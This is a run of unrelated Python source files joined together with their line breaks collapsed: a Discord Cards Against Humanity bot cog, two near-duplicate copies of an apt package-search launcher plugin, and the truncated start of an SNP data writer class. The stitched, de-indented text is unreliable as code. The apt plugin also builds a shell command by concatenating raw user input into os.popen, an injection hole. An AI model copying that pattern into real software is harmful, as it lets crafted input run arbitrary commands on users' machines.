blackCard = game["BlackCard"]["Text"] blackNum = game["BlackCard"]["Pick"] except Exception: blackCard = "None." blackNum = 0 msg = f"{judge} the judge.\n\n" msg += f"__Black Card:__\n\n**{blackCard}**\n\n" totalUsers = len(game["Members"]) - 1 submitted = len(game["Submitted"]) if len(game["Members"]) >= self.minMembers: if submitted < totalUsers: msg += f"{submitted}/{totalUsers} cards submitted..." else: msg += "All cards have been submitted!" await self.showOptions(ctx, user) return if not judge == "**YOU** are": # Judge doesn't need to lay a card if blackNum == 1: # Singular msg += f"\n\nLay a card with `{ctx.prefix}lay [card number]`" elif blackNum > 1: # Plural msg += f"\n\nLay **{blackNum} cards** with `{ctx.prefix}lay [card numbers separated by commas (1,2,3)]`" stat_embed.set_author(name="Current Play") stat_embed.set_footer(text=f"Cards Against Humanity - id: {game['ID']}") await user.send(embed=stat_embed) await user.send(msg) async def showHand(self, ctx, user): # Shows the user's hand in an embed stat_embed = discord.Embed(color=discord.Color.green()) game = await self.userGame(user) if not game: return i = 0 msg = "" points = "? points" for member in game["Members"]: if member["ID"] == user.id: # Got our user if member["Points"] == 1: points = "1 point" else: points = f"{member['Points']} points" for card in member["Hand"]: i += 1 msg += f"{i}. {card['Text']}\n" try: blackCard = f"**{game['BlackCard']['Text']}**" except Exception: blackCard = "**None.**" stat_embed.set_author(name=f"Your Hand - {points}") stat_embed.set_footer(text=f"Cards Against Humanity - id: {game['ID']}") await user.send(embed=stat_embed) await user.send(msg) async def showOptions(self, ctx, user): # Shows the judgement options stat_embed = discord.Embed(color=discord.Color.orange()) game = await self.userGame(user) if not game: return # Add title stat_embed.set_author(name="JUDGEMENT TIME!!") stat_embed.set_footer(text=f"Cards Against Humanity - id: {game['ID']}") await user.send(embed=stat_embed) if game["Members"][game["Judge"]]["User"] == user: judge = "**YOU** are" else: if game["Members"][game["Judge"]]["IsBot"]: # Bot judge = f"*{self.botName} ({game['Members'][game['Judge']]['ID']})* is" else: judge = f"*{self.displayname(game['Members'][game['Judge']]['User'])}* is" blackCard = game["BlackCard"]["Text"] msg = f"{judge} judging.\n\n" msg += f"__Black Card:__\n\n**{blackCard}**\n\n" msg += "__Submitted White Cards:__\n\n" i = 0 for sub in game["Submitted"]: i += 1 msg += "{}. {}\n".format(i, " - ".join(sub["Cards"])) if judge == "**YOU** are": msg += f"\nPick a winner with `{ctx.prefix}pick [submission number]`." await user.send(msg) async def drawCard(self, game): with open(str(bundled_data_path(self)) + "/deck.json", "r") as deck_file: deck = json.load(deck_file) # Draws a random unused card and shuffles the deck if needed totalDiscard = len(game["Discard"]) for member in game["Members"]: totalDiscard += len(member["Hand"]) if totalDiscard >= len(deck["whiteCards"]): # Tell everyone the cards were shuffled for member in game["Members"]: if member["IsBot"]: continue user = member["User"] await user.send("Shuffling white cards...") # Shuffle the cards self.shuffle(game) while True: # Random grab a unique card index = random.randint(0, len(deck["whiteCards"]) - 1) if not index in game["Discard"]: game["Discard"].append(index) text = deck["whiteCards"][index] text = self.cleanJson(text) card = {"Index": index, "Text": text} return card def shuffle(self, game): # Adds discards back into the deck game["Discard"] = [] for member in game["Members"]: for card in member["Hand"]: game["Discard"].append(card["Index"]) async def drawCards(self, user, cards=10): if not len(str(user)) == 4: if not type(user) is int: # Assume it's a discord.Member/User user = user.id # fills the user's hand up to number of cards game = await self.userGame(user) for member in game["Members"]: if member["ID"] == user: # Found our user - let's draw cards i = len(member["Hand"]) while i < cards: # Draw unique cards until we fill our hand newCard = await self.drawCard(game) member["Hand"].append(newCard) i += 1 async def drawBCard(self, game): with open(str(bundled_data_path(self)) + "/deck.json", "r") as deck_file: deck = json.load(deck_file) # Draws a random black card totalDiscard = len(game["BDiscard"]) if totalDiscard >= len(deck["blackCards"]): # Tell everyone the cards were shuffled for member in game["Members"]: if member["IsBot"]: continue user = member["User"] await user.send("Shuffling black cards...") # Shuffle the cards game["BDiscard"] = [] while True: # Random grab a unique card index = random.randint(0, len(deck["blackCards"]) - 1) if not index in game["BDiscard"]: game["BDiscard"].append(index) text = deck["blackCards"][index]["text"] text = self.cleanJson(text) game["BlackCard"] = {"Text": text, "Pick": deck["blackCards"][index]["pick"]} return game["BlackCard"] async def nextPlay(self, ctx, game): # Advances the game if len(game["Members"]) < self.minMembers: stat_embed = discord.Embed(color=discord.Color.red()) stat_embed.set_author( name=f"Not enough players to continue! ({len(game['Members'])}/{self.minMembers})" ) stat_embed.set_footer( text=f"Have other users join with: {ctx.prefix}joincah {game['ID']}" ) for member in game["Members"]: if member["IsBot"]: continue await member["User"].send(embed=stat_embed) return # Find if we have a winner winner = False stat_embed = discord.Embed(color=discord.Color.lighter_grey()) for member in game["Members"]: if member["IsBot"]: # Clear pending tasks and set to None if not member["Task"] == None: task = member["Task"] if not task.done(): # Task isn't finished - we're on a new hand, cancel it task.cancel() member["Task"] = None if member["Points"] >= self.winAfter: # We have a winner! winner = True if member["IsBot"]: stat_embed.set_author(name=f"{self.botName} ({member['ID']}) is the WINNER!!") else: stat_embed.set_author( name=f"{self.displayname(member['User'])} is the WINNER!!" ) stat_embed.set_footer(text="Congratulations!") break if winner: for member in game["Members"]: if not member["IsBot"]: await member["User"].send(embed=stat_embed) # Reset all users member["Hand"] = [] member["Points"] = 0 member["Won"] = [] member["Laid"] = False member["Refreshed"] = False return game["Judging"] = False # Clear submitted cards game["Submitted"] = [] # We have enough members if game["Judge"] == -1: # First game - randomize judge game["Judge"] = random.randint(0, len(game["Members"]) - 1) else: game["Judge"] += 1 # Reset the judge if out of bounds if game["Judge"] >= len(game["Members"]): game["Judge"] = 0 # Draw the next black card bCard = await self.drawBCard(game) # Draw cards for member in game["Members"]: member["Laid"] = False await self.drawCards(member["ID"]) # Show hands for member in game["Members"]: if member["IsBot"]: continue await self.showPlay(ctx, member["User"]) index = game["Members"].index(member) if not index == game["Judge"]: await self.showHand(ctx, member["User"]) await asyncio.sleep(0.1) # Have the bots lay their cards for member in game["Members"]: if not member["IsBot"]: continue if member["ID"] == game["Members"][game["Judge"]]["ID"]: continue # Not a human player, and not the judge # task = self.bot.loop.create_task(self.botPick(ctx, member, game))\ task = asyncio.ensure_future(self.botPick(ctx, member, game)) member["Task"] = task # await self.botPick(ctx, member, game) @commands.command() async def game(self, ctx, *, message=None): """Displays the game's current status.""" if not await self.checkPM(ctx.message): return userGame = await self.userGame(ctx.author) if not userGame: msg = f"You're not in a game - you can create one with `{ctx.prefix}newcah` or join one with `{ctx.prefix}joincah`." return await ctx.author.send(msg) await self.showPlay(ctx, ctx.author) @commands.command() async def chat(self, ctx, *, message=None): """Broadcasts a message to the other players in your game.""" if not await self.checkPM(ctx.message): return userGame = await self.userGame(ctx.author) if not userGame: msg = f"You're not in a game - you can create one with `{ctx.prefix}newcah` or join one with `{ctx.prefix}joincah`." return await ctx.author.send(msg) userGame["Time"] = int(time.time()) if message == None: msg = "Ooookay, you say *nothing...*" return await ctx.author.send(msg) msg = f"*{ctx.author.name}* says: {message}" for member in userGame["Members"]: if member["IsBot"]: continue # Tell them all!! if not member["User"] == ctx.author: # Don't tell yourself await member["User"].send(msg) else: # Update member's time member["Time"] = int(time.time()) await ctx.author.send("Message sent!") @commands.command() async def lay(self, ctx, *, card=None): """Lays a card or cards from your hand. If multiple cards are needed, separate them by a comma (1,2,3).""" if not await self.checkPM(ctx.message): return userGame = await self.userGame(ctx.author) if not userGame: msg = f"You're not in a game - you can create one with `{ctx.prefix}newcah` or join one with `{ctx.prefix}joincah`." return await ctx.author.send(msg) userGame["Time"] = int(time.time()) for member in userGame["Members"]: if member["User"] == ctx.author: member["Time"] = int(time.time()) user = member index = userGame["Members"].index(member) if index == userGame["Judge"]: await ctx.author.send( "You're the judge. You don't get to lay cards this round." ) return for submit in userGame["Submitted"]: if submit["By"]["User"] == ctx.author: await ctx.author.send("You already made your submission this round.") return if card == None: await ctx.author.send("You need you input *something.*") return card = card.strip() card = card.replace(" ", "") # Not the judge if len(userGame["Members"]) < self.minMembers: stat_embed = discord.Embed(color=discord.Color.red()) stat_embed.set_author( name=f"Not enough players to continue! ({len(userGame['Members'])}/{self.minMembers})" ) stat_embed.set_footer( text=f"Have other users join with: {ctx.prefix}joincah {userGame['ID']}" ) return await ctx.author.send(embed=stat_embed) numberCards = userGame["BlackCard"]["Pick"] cards = [] if numberCards > 1: cardSpeak = "cards" try: card = card.split(",") except Exception: card = [] if not len(card) == numberCards: await ctx.author.send( f"You need to lay **{numberCards} cards** (no duplicates) with `{ctx.prefix}lay [card numbers separated by commas (1,2,3)]`" ) return await self.showHand(ctx, ctx.author) # Got something # Check for duplicates if not len(card) == len(set(card)): await ctx.author.send( f"You need to lay **{numberCards} cards** (no duplicates) with `{ctx.prefix}lay [card numbers separated by commas (1,2,3)]`" ) return await self.showHand(ctx, ctx.author) # Works for c in card: try: c = int(c) except Exception: await ctx.author.send( f"You need to lay **{numberCards} cards** (no duplicates) with `{ctx.prefix}lay [card numbers separated by commas (1,2,3)]`" ) return await self.showHand(ctx, ctx.author) if c < 1 or c > len(user["Hand"]): await ctx.author.send( f"Card numbers must be between 1 and {len(user['Hand'])}." ) return await self.showHand(ctx, ctx.author) cards.append(user["Hand"][c - 1]["Text"]) # Remove from user's hand card = sorted(card, key=lambda card: int(card), reverse=True) for c in card: user["Hand"].pop(int(c) - 1) # Valid cards newSubmission = {"By": user, "Cards": cards} else: cardSpeak = "card" try: card = int(card) except Exception: await ctx.author.send( f"You need to lay a valid card with `{ctx.prefix}lay [card number]`" ) return await self.showHand(ctx, ctx.author) if card < 1 or card > len(user["Hand"]): await ctx.author.send(f"Card numbers must be between 1 and {len(user['Hand'])}.") return await self.showHand(ctx, ctx.author) # Valid card newSubmission = {"By": user, "Cards": [user["Hand"].pop(card - 1)["Text"]]} userGame["Submitted"].append(newSubmission) # Shuffle cards shuffle(userGame["Submitted"]) user["Laid"] = True await ctx.author.send(f"You submitted your {cardSpeak}!") await self.checkSubmissions(ctx, userGame, user) @commands.command() async def pick(self, ctx, *, card=None): """As the judge - pick the winning card(s).""" if not await self.checkPM(ctx.message): return # Check if the user is already in game userGame = await self.userGame(ctx.author) if not userGame: # Not in a game msg = f"You're not in a game - you can create one with `{ctx.prefix}newcah` or join one with `{ctx.prefix}joincah`." return await ctx.author.send(msg) userGame["Time"] = int(time.time()) isJudge = False for member in userGame["Members"]: if member["User"] == ctx.author: member["Time"] = int(time.time()) user = member index = userGame["Members"].index(member) if index == userGame["Judge"]: isJudge = True if not isJudge: msg = "You're not the judge - I guess you'll have to wait your turn." return await ctx.author.send(msg) # Am judge totalUsers = len(userGame["Members"]) - 1 submitted = len(userGame["Submitted"]) if submitted < totalUsers: if totalUsers - submitted == 1: msg = "Still waiting on 1 card..." else: msg = f"Still waiting on {totalUsers - submitted} cards..." await ctx.author.send(msg) return try: card = int(card) - 1 except Exception: card = -1 if card < 0 or card >= totalUsers: return await ctx.author.send(f"Your pick must be between 1 and {totalUsers}.") # Pick is good! await self.winningCard(ctx, userGame, card) @commands.command() async def hand(self, ctx): """Shows your hand.""" if not await self.checkPM(ctx.message): return # Check if the user is already in game userGame = await self.userGame(ctx.author) if not userGame: # Not in a game return await ctx.author.send( f"You're not in a game - you can create one with `{ctx.prefix}newcah` or join one with `{ctx.prefix}joincah`." ) await self.showHand(ctx, ctx.author) userGame["Time"] = currentTime = int(time.time()) @commands.command() async def newcah(self, ctx): """Starts a new Cards Against Humanity game.""" # if not await self.checkPM(ctx.message): # return # Check if the user is already in game userGame = await self.userGame(ctx.author) if userGame: # Already in a game return await ctx.author.send( f"You're already in a game (id: *{userGame['ID']}*)\nType `{ctx.prefix}leavecah` to leave that game." ) # Not in a game - create a new one gameID = self.randomID() currentTime = int(time.time()) newGame = { "ID": gameID, "Members": [], "Discard": [], "BDiscard": [], "Judge": -1, "Time": currentTime, "BlackCard": None, "Submitted": [], "NextHand": asyncio.Event(), "Judging": False, "Timeout": True, } member = { "ID": ctx.author.id, "User": ctx.author, "Points": 0, "Won": [], "Hand": [], "Laid": False, "Refreshed": False, "IsBot": False, "Creator": True, "Task": None, "Time": currentTime, } newGame["Members"].append(member) newGame["Running"] = True task = self.bot.loop.create_task(self.gameCheckLoop(ctx, newGame)) task = self.bot.loop.create_task(self.checkCards(ctx, newGame)) self.games.append(newGame) # Tell the user they created a new game and list its ID await ctx.message.channel.send(f"You created game id: *{gameID}*") await self.drawCards(ctx.author) # await self.showHand(ctx, ctx.author) # await self.nextPlay(ctx, newGame) @commands.command() async def leavecah(self, ctx): """Leaves the current game you're in.""" removeCheck = await self.removeMember(ctx.author) if not removeCheck: msg = "You are not in a game." await ctx.message.channel.send(msg) return if self.checkGame(removeCheck): # await self.nextPlay(ctx, removeCheck) """# Start the game loop event = removeCheck['NextHand'] self.bot.loop.call_soon_threadsafe(event.set)""" # Player was removed - try to handle it calmly... await self.checkSubmissions(ctx, removeCheck) @commands.command() async def joincah(self, ctx, *, id=None): """Join a Cards Against Humanity game. If no id or user is passed, joins a random game.""" # if not await self.checkPM(ctx.message): # return # Check if the user is already in game userGame = await self.userGame(ctx.author) isCreator = False if userGame: # Already in a game return await ctx.message.channel.send( f"You're already in a game (id: *{userGame['ID']}*)\nType `{ctx.prefix}leavecah` to leave that game." ) if len(self.games): if id: game = self.gameForID(id) if game == None: # That id doesn't exist - or is possibly a user # If user, has to be joined from server chat if not ctx.message.guild: return await ctx.message.channel.send( f"I couldn't find a game attached to that id. If you are trying to join a user - run the `{ctx.prefix}joincah [user]` command in a channel on a server you share with that user." ) else: # We have a server - let's try for a user member = self.memberforname(id, ctx.message.guild) if not member: # Couldn't find user! return await ctx.message.channel.send( f"I couldn't find a game attached to that id. If you are trying to join a user - run the `{ctx.prefix}joincah [user]` command in a channel on a server you share with that user." ) # Have a user - check if they're in a game game = await self.userGame(member) if not game: # That user is NOT in a game! return await ctx.message.channel.send( "That user doesn't appear to be playing." ) else: game = random.choice(self.games) else: # No games - create a new one gameID = self.randomID() currentTime = int(time.time()) game = { "ID": gameID, "Members": [], "Discard": [], "BDiscard": [], "Judge": -1, "Time": currentTime, "BlackCard": None, "Submitted": [], "NextHand": asyncio.Event(), "Judging": False, "Timeout": True, } game["Running"] = True task = self.bot.loop.create_task(self.gameCheckLoop(ctx, game)) task = self.bot.loop.create_task(self.checkCards(ctx, game)) self.games.append(game) # Tell the user they created a new game and list its ID await ctx.message.channel.send(f"**You created game id:** ***{gameID}***") isCreator = True # Tell everyone else you joined for member in game["Members"]: if member["IsBot"]: continue await member["User"].send(f"***{self.displayname(ctx.author)}*** **joined the game!**") # We got a user! currentTime = int(time.time()) member = { "ID": ctx.author.id, "User": ctx.author, "Points": 0, "Won": [], "Hand": [], "Laid": False, "Refreshed": False, "IsBot": False, "Creator": isCreator, "Task": None, "Time": currentTime, } game["Members"].append(member) await self.drawCards(ctx.author) if len(game["Members"]) == 1: # Just created the game await self.drawCards(ctx.author) else: await ctx.message.channel.send( f"**You've joined game id:** ***{game['ID']}!***\n\nThere are *{len(game['Members'])} users* in this game." ) # Check if adding put us at minimum members if len(game["Members"]) - 1 < self.minMembers: # It was - *actually* start a game event = game["NextHand"] self.bot.loop.call_soon_threadsafe(event.set) else: # It was not - just incorporate new players await self.checkSubmissions(ctx, game) # Reset judging flag to retrigger actions game["Judging"] = False # Show the user the current card and their hand await self.showPlay(ctx, member["User"]) await self.showHand(ctx, member["User"]) event = game["NextHand"] game["Time"] = int(time.time()) @commands.command() async def joinbot(self, ctx): """Adds a bot to the game. Can only be done by the player who created the game.""" if not await self.checkPM(ctx.message): return # Check if the user is already in game userGame = await self.userGame(ctx.author) if not userGame: # Not in a game return await ctx.author.send( f"You're not in a game - you can create one with `{ctx.prefix}newcah` or join one with `{ctx.prefix}joincah`." ) botCount = 0 for member in userGame["Members"]: if member["IsBot"]: botCount += 1 continue if member["User"] == ctx.author: if not member["Creator"]: # You didn't make this game msg = "Only the player that created the game can add bots." await ctx.author.send(msg) return member["Time"] = int(time.time()) # We are the creator - let's check the number of bots if botCount >= self.maxBots: # Too many bots! return await ctx.author.send(f"You already have enough bots (max is {self.maxBots}).") # We can get another bot! botID = self.randomBotID(userGame) lobot = { "ID": botID, "User": None, "Points": 0, "Won": [], "Hand": [], "Laid": False, "Refreshed": False, "IsBot": True, "Creator": False, "Task": None, } userGame["Members"].append(lobot) await self.drawCards(lobot["ID"]) for member in userGame["Members"]: if member["IsBot"]: continue await member["User"].send(f"***{self.botName} ({botID})*** **joined the game!**") # await self.nextPlay(ctx, userGame) # Check if adding put us at minimum members if len(userGame["Members"]) - 1 < self.minMembers: # It was - *actually* start a game event = userGame["NextHand"] self.bot.loop.call_soon_threadsafe(event.set) else: # It was not - just incorporate new players await self.checkSubmissions(ctx, userGame) # Reset judging flag to retrigger actions userGame["Judging"] = False # Schedule stuff task = asyncio.ensure_future(self.botPick(ctx, lobot, userGame)) lobot["Task"] = task @commands.command() async def joinbots(self, ctx, number=None): """Adds bots to the game. Can only be done by the player who created the game.""" if not await self.checkPM(ctx.message): return # Check if the user is already in game userGame = await self.userGame(ctx.author) if not userGame: # Not in a game return await ctx.author.send( f"You're not in a game - you can create one with `{ctx.prefix}newcah` or join one with `{ctx.prefix}joincah`." ) botCount = 0 for member in userGame["Members"]: if member["IsBot"]: botCount += 1 continue if member["User"] == ctx.author: if not member["Creator"]: # You didn't make this game msg = "Only the player that created the game can add bots." await ctx.author.send(msg) return member["Time"] = int(time.time()) if number == None: # No number specified - let's add the max number of bots number = self.maxBots - botCount try: number = int(number) except Exception: msg = "Number of bots to add must be an integer." await ctx.author.send(msg) return # We are the creator - let's check the number of bots if botCount >= self.maxBots: # Too many bots! return await ctx.author.send(f"You already have enough bots (max is {self.maxBots}).") if number > (self.maxBots - botCount): number = self.maxBots - botCount if number == 1: msg = f"**Adding {number} bot:**\n\n" else: msg = f"**Adding {number} bots:**\n\n" newBots = [] for i in range(0, number): # We can get another bot! botID = self.randomBotID(userGame) lobot = { "ID": botID, "User": None, "Points": 0, "Won": [], "Hand": [], "Laid": False, "Refreshed": False, "IsBot": True, "Creator": False, "Task": None, } userGame["Members"].append(lobot) newBots.append(lobot) await self.drawCards(lobot["ID"]) msg += f"***{self.botName} ({botID})*** **joined the game!**\n" # await self.nextPlay(ctx, userGame) for member in userGame["Members"]: if member["IsBot"]: continue await member["User"].send(msg) # Check if adding put us at minimum members if len(userGame["Members"]) - number < self.minMembers: # It was - *actually* start a game event = userGame["NextHand"] self.bot.loop.call_soon_threadsafe(event.set) else: # It was not - just incorporate new players await self.checkSubmissions(ctx, userGame) # Reset judging flag to retrigger actions game["Judging"] = False for bot in newBots: # Schedule stuff task = asyncio.ensure_future(self.botPick(ctx, bot, userGame)) bot["Task"] = task @commands.command() async def removebot(self, ctx, *, id=None): """Removes a bot from the game. Can only be done by the player who created the game.""" if not await self.checkPM(ctx.message): return # Check if the user is already in game userGame = await self.userGame(ctx.author) if not userGame: # Not in a game return await ctx.author.send( f"You're not in a game - you can create one with `{ctx.prefix}newcah` or join one with `{ctx.prefix}joincah`." ) botCount = 0 for member in userGame["Members"]: if member["IsBot"]: botCount += 1 continue if member["User"] == ctx.author: if not member["Creator"]: # You didn't make this game return await ctx.author.send( "Only the player that created the game can remove bots." ) member["Time"] = int(time.time()) # We are the creator - let's check the number of bots if id == None: # Just remove the first bot we find for member in userGame["Members"]: if member["IsBot"]: await self.removeMember(member["ID"]) """# Start the game loop event = userGame['NextHand'] self.bot.loop.call_soon_threadsafe(event.set)""" # Bot was removed - try to handle it calmly... return await self.checkSubmissions(ctx, userGame) msg = "No bots to remove!" await ctx.author.send(msg) return else: # Remove a bot by id if not await self.removeMember(id): # not found return await ctx.author.send( f"I couldn't locate that bot on this game. If you're trying to remove a player, try the `{ctx.prefix}removeplayer [name]` command." ) # await self.nextPlay(ctx, userGame) """# Start the game loop event = userGame['NextHand'] self.bot.loop.call_soon_threadsafe(event.set)""" # Bot was removed - let's try to handle it calmly... await self.checkSubmissions(ctx, userGame) @commands.command() async def cahgames(self, ctx): """Displays up to 10 CAH games in progress.""" shuffledGames = list(self.games) random.shuffle(shuffledGames) if not len(shuffledGames): await ctx.message.channel.send("No games being played currently.") return max = 10 if len(shuffledGames) < 10: max = len(shuffledGames) msg = "__Current CAH Games__:\n\n" for i in range(0, max): playerCount = 0 botCount = 0 gameID = shuffledGames[i]["ID"] for j in shuffledGames[i]["Members"]: if j["IsBot"]: botCount += 1 else: playerCount += 1 botText = f"{botCount} bot" if not botCount == 1: botText += "s" playerText = f"{playerCount} player" if not playerCount == 1: playerText += "s" msg += f"{i + 1}. {gameID} - {playerText} | {botText}\n" await ctx.message.channel.send(msg) @commands.command() async def score(self, ctx): """Display the score of the current game.""" if not await self.checkPM(ctx.message): return # Check if the user is already in game userGame = await self.userGame(ctx.author) if not userGame: # Not in a game return await ctx.author.send( f"You're not in a game - you can create one with `{ctx.prefix}newcah` or join one with `{ctx.prefix}joincah`." ) stat_embed = discord.Embed(color=discord.Color.purple()) stat_embed.set_author(name="Current Score") stat_embed.set_footer(text=f"Cards Against Humanity - id: {userGame['ID']}") await ctx.author.send(embed=stat_embed) users = sorted(userGame["Members"], key=lambda card: int(card["Points"]), reverse=True) msg = "" i = 0 if len(users) > 10: msg += f"__10 of {len(users)} Players:__\n\n" else: msg += "__Players:__\n\n" for user in users: i += 1 if i > 10: break if user["Points"] == 1: if user["User"]: # Person msg += f"{i}. *{self.displayname(user['User'])}* - 1 point\n" else: # Bot msg += f"{i}. *{self.botName} ({user['ID']})* - 1 point\n" else: if user["User"]: # Person msg += f"{i}. *{self.displayname(user['User'])}* - {user['Points']} points\n" else: # Bot msg += f"{i}. *{self.botName} ({user['ID']})* - {user['Points']} points\n" await ctx.author.send(msg) @commands.command() async def laid(self, ctx): """Shows who laid their cards and who hasn't.""" if not await self.checkPM(ctx.message): return # Check if the user is already in game userGame = await self.userGame(ctx.author) if not userGame: # Not in a game return await ctx.author.send( f"You're not in a game - you can create one with `{ctx.prefix}newcah` or join one with `{ctx.prefix}joincah`." ) stat_embed = discord.Embed(color=discord.Color.purple()) stat_embed.set_author(name="Card Check") stat_embed.set_footer(text=f"Cards Against Humanity - id: {userGame['ID']}") await ctx.author.send(embed=stat_embed) users = sorted(userGame["Members"], key=lambda card: int(card["Laid"])) msg = "" i = 0 if len(users) > 10: msg += f"__10 of {len(users)} Players:__\n\n" else: msg += "__Players:__\n\n" for user in users: if len(userGame["Members"]) >= self.minMembers: if user == userGame["Members"][userGame["Judge"]]: continue i += 1 if i > 10: break if user["Laid"]: if user["User"]: # Person msg += f"{i}. *{self.displayname(user['User'])}* - Cards are in.\n" else: # Bot msg += f"{i}. *{self.botName} ({user['ID']})* - Cards are in.\n" else: if user["User"]: # Person msg += f"{i}. *{self.displayname(user['User'])}* - Waiting for cards...\n" else: # Bot msg += f"{i}. *{self.botName} ({user['ID']})* - Waiting for cards...\n" await ctx.author.send(msg) @commands.command() async def removeplayer(self, ctx, *, name=None): """Removes a player from the game. Can only be done by the player who created the game.""" if not await self.checkPM(ctx.message): return # Check if the user is already in game userGame = await self.userGame(ctx.author) if not userGame: # Not in a game return await ctx.author.send( f"You're not in a game - you can create one with `{ctx.prefix}newcah` or join one with `{ctx.prefix}joincah`." ) botCount = 0 for member in userGame["Members"]: if member["IsBot"]: botCount += 1 continue if member["User"] == ctx.author: if not member["Creator"]: # You didn't make this game msg = "Only the player that created the game can remove players." await ctx.author.send(msg) return member["Time"] = int(time.time()) # We are the creator - let's check the number of bots if name == None: # Nobody named! msg = "Okay, I removed... no one from the game..." await ctx.author.send(msg) return # Let's get the person either by name, or by id nameID = "".join(list(filter(str.isdigit, name))) for member in userGame["Members"]: toRemove = False if member["IsBot"]: continue if name.lower() == self.displayname(member["User"]).lower(): # Got em! toRemove = True elif nameID == member["ID"]: # Got em! toRemove = True if toRemove: await self.removeMember(member["ID"]) break # await self.nextPlay(ctx, userGame) if toRemove: """# Start the game loop event = userGame['NextHand'] self.bot.loop.call_soon_threadsafe(event.set)""" # Player was removed - try to handle it calmly... await self.checkSubmissions(ctx, userGame) else: msg = f"I couldn't locate that player on this game. If you're trying to remove a bot, try the `{ctx.prefix}removebot [id]` command." return await ctx.author.send(msg) @commands.command() async def flushhand(self, ctx): """Flushes the cards in your hand - can only be done once per game.""" if not await self.checkPM(ctx.message): return # Check if the user is already in game userGame = await self.userGame(ctx.author) if not userGame: # Not in a game return await ctx.author.send( f"You're not in a game - you can create one with `{ctx.prefix}newcah` or join one with `{ctx.prefix}joincah`." ) if userGame["Judge"] == -1: msg = "The game hasn't started yet. Probably not worth it to flush your hand before you get it..." await ctx.author.send(msg) return for member in userGame["Members"]: if member["IsBot"]: continue if member["User"] == ctx.author: member["Time"] = int(time.time()) # Found us! if member["Refreshed"]: # Already flushed their hand msg = "You have already flushed your hand this game." await ctx.author.send(msg) return else: member["Hand"] = [] await self.drawCards(member["ID"]) member["Refreshed"] = True msg = "Flushing your hand!" await ctx.author.send(msg) await self.showHand(ctx, ctx.author) return @commands.command() async def idlekick(self, ctx, *, setting=None): """Sets whether or not to kick members if idle for 5 minutes or more. Can only be done by the player who created the game.""" if not await self.checkPM(ctx.message): return # Check if the user is already in game userGame = await self.userGame(ctx.author) if not userGame: # Not in a game return await ctx.author.send( f"You're not in a game - you can create one with `{ctx.prefix}newcah` or join one with `{ctx.prefix}joincah`." ) botCount = 0 for member in userGame["Members"]: if member["IsBot"]: botCount += 1 continue if member["User"] == ctx.author: if not member["Creator"]: # You didn't make this game msg = "Only the player that created the game can remove bots." await ctx.author.send(msg) return # We are the creator - let's check the number of bots if setting == None: # Output idle kick status if userGame["Timeout"]: await ctx.message.channel.send("Idle kick is enabled.") else: await ctx.message.channel.send("Idle kick is disabled.") return elif setting.lower() == "yes" or setting.lower() == "on" or setting.lower() == "true": setting = True elif setting.lower() == "no" or setting.lower() == "off" or setting.lower() == "false": setting = False else: setting = None if setting == True: if userGame["Timeout"] == True: msg = "Idle kick remains enabled." else: msg = "Idle kick now enabled." for member in userGame["Members"]: member["Time"] = int(time.time()) else: if userGame["Timeout"] == False: msg = "Idle kick remains disabled." else: msg = "Idle kick now disabled." userGame["Timeout"] = setting await ctx.message.channel.send(msg) @commands.command() async def cahcredits(self, ctx): """Code credits.""" await ctx.send( "```\nThis cog is made possible by CorpBot.\nPlease visit https://github.com/corpnewt/CorpBot.py for more information.\n```" )
#!/usr/bin/python3 import os from UIBox import pkg def Results(parent): data = os.popen("apt-cache search " + parent.text, "r").readlines() if not parent.text: return [{ "title" : "Start typing the package name", "subtitle" : "Remember, you can use regular expresions For example: apty ^steam", "key": "" }] if not data: return [ { "title": "No package " + parent.text + " could be found", "highlightable": False, "subtitle":"Are your repositories updated? (sudo apt update) " "Remember, you can use regular expresions For example: apty ^steam", } ] results = [] for i in range(int(parent.settings("max_results", 12))): package = data[i] package_name = package.split(" - ")[0] package_description = package.split(" - ")[1] results.append( { "title": package_name, "subtitle": package_description, "func": lambda p, i: pkg.run_app(f"{parent.settings("term", "terminal")} '{parent.settings("cmd", "sudo apt install -u")} {i.title}'"), "ctrl_enter": lambda p, i: parent.text_copy(i.title) } ) return results
#!/usr/bin/python3 import os from UIBox import pkg def Results(parent): data = os.popen("apt-cache search " + parent.text, "r").readlines() if not parent.text: return [{ "title" : "Start typing the package name", "subtitle" : "Remember, you can use regular expresions For example: apty ^steam", "key": "" }] if not data: return [ { "title": "No package " + parent.text + " could be found", "highlightable": False, "subtitle":"Are your repositories updated? (sudo apt update) " "Remember, you can use regular expresions For example: apty ^steam", } ] results = [] for i in range(int(parent.settings("max_results", 12))): package = data[i] package_name = package.split(" - ")[0] package_description = package.split(" - ")[1] results.append( { "title": package_name, "subtitle": package_description, "func": lambda p, i: pkg.run_app(f"{parent.settings('term', 'terminal')} '{parent.settings('cmd', 'sudo apt install -u')} {i.title}'"), "ctrl_enter": lambda p, i: parent.text_copy(i.title) } ) return results
""" Class for writing SNPs. """ """ BSD 3-Clause License Copyright (c) 2019, Andrew Riha All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. """ import datetime import logging import numpy as np import pandas as pd import snps from snps.utils import save_df_as_csv, clean_str logger = logging.getLogger(__name__) class Writer: """Class for writing SNPs to files.""" def __init__(self, snps=None, filename="", vcf=False, atomic=True, **kwargs): """Initialize a `Writer`. Parameters ---------- snps : SNPs SNPs to save to file or write to buffer filename : str or 